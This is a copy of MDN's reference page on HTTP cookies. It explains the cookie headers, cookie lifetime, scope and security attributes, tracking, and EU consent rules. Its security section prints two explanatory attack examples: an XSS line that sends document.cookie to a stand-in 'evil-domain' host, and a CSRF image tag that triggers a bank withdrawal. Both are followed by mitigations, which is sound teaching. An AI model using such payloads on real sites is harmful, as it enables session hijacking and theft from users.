An HTTP cookie (web cookie, browser cookie) is a small piece of data that a server sends to the user's web browser. The browser may store it and send it back with the next request to the same server. Typically, it's used to tell if two requests came from the same browser — keeping a user logged-in, for example. It remembers stateful information for the stateless HTTP protocol.
Cookies are mainly used for three purposes:
Cookies were once used for general client-side storage. While this was legitimate when they were the only way to store data on the client, it is recommended nowadays to prefer modern storage APIs. Cookies are sent with every request, so they can worsen performance (especially for mobile data connections). Modern APIs for client storage are the Web storage API (localStorage
and sessionStorage
) and IndexedDB.
To see stored cookies (and other storage that a web page can use), you can enable the Storage Inspector in Developer Tools and select Cookies from the storage tree.
When receiving an HTTP request, a server can send a Set-Cookie
header with the response. The cookie is usually stored by the browser, and then the cookie is sent with requests made to the same server inside a Cookie
HTTP header. An expiration date or duration can be specified, after which the cookie is no longer sent. Additionally, restrictions to a specific domain and path can be set, limiting where the cookie is sent.
Set-Cookie
and Cookie
headersThe Set-Cookie
HTTP response header sends cookies from the server to the user agent. A simple cookie is set like this:
Set-Cookie: <cookie-name>=<cookie-value>
This header from the server tells the client to store a cookie.
Set-Cookie
header in various server-side applications: HTTP/1.0 200 OK Content-type: text/html Set-Cookie: yummy_cookie=choco Set-Cookie: tasty_cookie=strawberry [page content]
GET /sample_page.html HTTP/1.1 Host: www.example.org Cookie: yummy_cookie=choco; tasty_cookie=strawberry
The cookie created above is a session cookie: it is deleted when the client shuts down, because it didn't specify an Expires
or Max-Age
directive. However, web browsers may use session restoring, which makes most session cookies permanent, as if the browser was never closed.
Instead of expiring when the client closes,permanent cookies expire at a specific date (Expires
) or after a specific length of time (Max-Age
).
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;
Note: When an expiry date is set, the time and date set is relative to the client the cookie is being set on, not the server.
Secure
and HttpOnly
cookiesA secure cookie is only sent to the server with an encrypted request over the HTTPS protocol. Even with Secure
, sensitive information should never be stored in cookies, as they are inherently insecure and this flag can't offer real protection. Starting with Chrome 52 and Firefox 52, insecure sites (http:
) can't set cookies with the Secure
directive.
To prevent cross-site scripting (XSS) attacks, HttpOnly
cookies are inaccessible to JavaScript's Document.cookie
API; they are only sent to the server. For example, cookies that persist server-side sessions don't need to be available to JavaScript, and the HttpOnly
flag should be set.
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
The Domain
and Path
directives define the scope of the cookie: what URLs the cookies should be sent to.
Domain
specifies allowed hosts to receive the cookie. If unspecified, it defaults to the host of the current document location, excluding subdomains. If Domain
is specified, then subdomains are always included.
For example, if Domain=mozilla.org
is set, then cookies are included on subdomains like developer.mozilla.org
.
Path
indicates a URL path that must exist in the requested URL in order to send the Cookie
header. The %x2F ("/") character is considered a directory separator, and subdirectories will match as well.
For example, if Path=/docs
is set, these paths will match:
/docs
/docs/Web/
/docs/Web/HTTP
SameSite
cookies
SameSite
cookies let servers require that a cookie shouldn't be sent with cross-site requests, which somewhat protects against cross-site request forgery attacks (CSRF). SameSite
cookies are still experimental and not yet supported by all browsers.
The same-site attribute can have one of two values:
strict
strict
attribute will be included.lax
Document.cookie
New cookies can also be created via JavaScript using the Document.cookie
property, and if the HttpOnly
flag is not set, existing cookies can be accessed from JavaScript as well.
document.cookie = "yummy_cookie=choco"; document.cookie = "tasty_cookie=strawberry"; console.log(document.cookie); // logs "yummy_cookie=choco; tasty_cookie=strawberry"
Please note the security issues in the Security section below. Cookies available to JavaScript can get stolen through XSS.
Confidential or sensitive information should never be stored or transmitted in HTTP Cookies, as the entire mechanism is inherently insecure.
Cookies are often used in web application to identify a user and their authenticated session, so stealing a cookie can lead to hijacking the authenticated user's session. Common ways to steal cookies include Social Engineering or exploiting an XSS vulnerability in the application.
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
The HttpOnly
cookie attribute can help to mitigate this attack by preventing access to cookie value through JavaScript.
Wikipedia mentions a good example for CSRF. In this situation, someone includes an image that isn’t really an image (for example in an unfiltered chat or forum), instead it really is a request to your bank’s server to withdraw money:
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
Now, if you are logged into your bank account and your cookies are still valid (and there is no other validation), you will transfer money as soon as you load the HTML that contains this image. There are a few techniques that are used to prevent this from happening:
Cookies have a domain associated to them. If this domain is the same as the domain of the page you are on, the cookies is said to be a first-party cookie. If the domain is different, it is said to be a third-party cookie. While first-party cookies are sent only to the server setting them, a web page may contain images or other components stored on servers in other domains (like ad banners). Cookies that are sent through these third-party components are called third-party cookies and are mainly used for advertising and tracking across the web. See for example the types of cookies used by Google. Most browsers allow third-party cookies by default, but there are add-ons available to block them (for example, Privacy Badger by the EFF).
If you are not disclosing third-party cookies, consumer trust might get harmed if cookie use is discovered. A clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of a cookie discovery. Some countries also have legislation about cookies. See for example Wikimedia Foundation's cookie statement.
There are no legal or technological requirements for its use, but the DNT
header can be used to signal that a web application should disable either its tracking or cross-site user tracking of an individual user. See the DNT
header for more information.
Requirements for cookies across the EU are defined in Directive 2009/136/EC of the European Parliament and came into effect on 25 May 2011. A directive is not a law by itself, but a requirement for EU member states to put laws in place that meet the requirements of the directive. The actual laws can differ from country to country.
In short the EU directive means that before somebody can store or retrieve any information from a computer, mobile phone or other device, the user must give informed consent to do so. Many websites have added banners (AKA "cookie banners") since then to inform the user about the use of cookies.
For more, see this Wikipedia section and consult state laws for the latest and most accurate information.
A more radical approach to cookies are zombie cookies or "Evercookies" which are recreated after their deletion and are intentionally hard to delete forever. They are using the Web storage API, Flash Local Shared Objects and other techniques to recreate themselves whenever the cookie's absence is detected.
Set-Cookie
Cookie
Document.cookie
Navigator.cookieEnabled
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Licensed under the Creative Commons Attribution-ShareAlike License v2.5 or later.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies